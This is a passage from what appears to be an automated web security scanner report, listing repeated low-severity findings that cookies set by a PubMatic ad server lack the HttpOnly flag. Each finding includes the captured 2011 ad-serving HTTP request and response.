The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A22&ranreq=0.05175817455165088&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:56 GMT
Content-Length: 1477
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:56 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1153720359=794-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:56 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAA
...[SNIP]...

12.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A23&ranreq=0.775478285504505&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 1305
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:57 GMT; path=/
Set-Cookie: pubfreq_27331_22455_368828559=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:57 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.8495062424335629&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1861
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_22455_875178760=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A6%3A17&ranreq=0.6719533267896622&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=2703x172&adVisibility=2 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:51 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:51 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1937773865=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:51 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:51 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A5%3A36&ranreq=0.5191648581530899&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71482072&rk1=45911150&rk2=1316239536.305&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:11 GMT
Content-Length: 1380
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:11 GMT; path=/
Set-Cookie: pubfreq_27331_22455_482022647=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:11 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A6%3A17&ranreq=0.5169704589061439&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=5x296&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:51 GMT
Content-Length: 1857
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:51 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1788055834=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:51 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:51 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A16&ranreq=0.6765466905198991&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:50 GMT
Content-Length: 1563
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:50 GMT; path=/
Set-Cookie: pubfreq_27331_23101_261214099=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:50 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

12.212. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A35&ranreq=0.6366450756322592&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:09 GMT
Content-Length: 1857
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:09 GMT; path=/
Set-Cookie: pubfreq_27331_22455_684268577=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:09 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:09 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.213. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A7%3A7&ranreq=0.8784720080439001&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
